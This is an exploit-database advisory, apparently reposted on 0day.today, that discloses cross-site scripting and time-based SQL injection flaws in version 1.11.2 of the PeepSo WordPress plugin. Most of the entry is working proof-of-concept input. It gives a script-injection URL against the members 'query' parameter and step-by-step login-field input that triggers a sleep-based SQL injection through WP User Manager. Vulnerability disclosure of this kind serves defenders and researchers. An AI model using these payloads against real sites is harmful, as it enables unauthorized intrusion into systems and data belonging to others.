id: 31570
date: 11/12/2018
title: WordPress PeepSo 1.11.2 XSS / SQL Injection Vulnerabilities
author: Socket_0x03
cves: 

WordPress PeepSo 1.11.2 XSS / SQL Injection Vulnerabilities

 # Author: Socket_0x03 (Alvaro J. Gene)

 # Software Link: https://wordpress.org/plugins/peepso-core/

 # Plugin: PeepSo

 # Version: 1.11.2

 # File: Members    

 # Parameter: query

 # Language: This application is available in English language.

 # Plugin Description: PeepSo is a social network plugin for WordPress with different
   kinds of features, such as user profiles, user registration, and other features. 
   
____________________________________________________________________________________


 #  Cross-Site Scripting Vulnerability: 
 
    http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>

____________________________________________________________________________________


 #  Time-Based SQL Injection:

        First, install WP User Manager v2.0.8.
        Second, install PeepSo v1.11.2
        Third, go to the login panel of WP User Manager:
        http://www.website.com/wordpress/index.php/login
        Fourth, type the SQL injection:
          Username: iawcfqto'=sleep(10)='
          Password: password
        Finally, click on Login



#  0day.today [2023-03-22]  #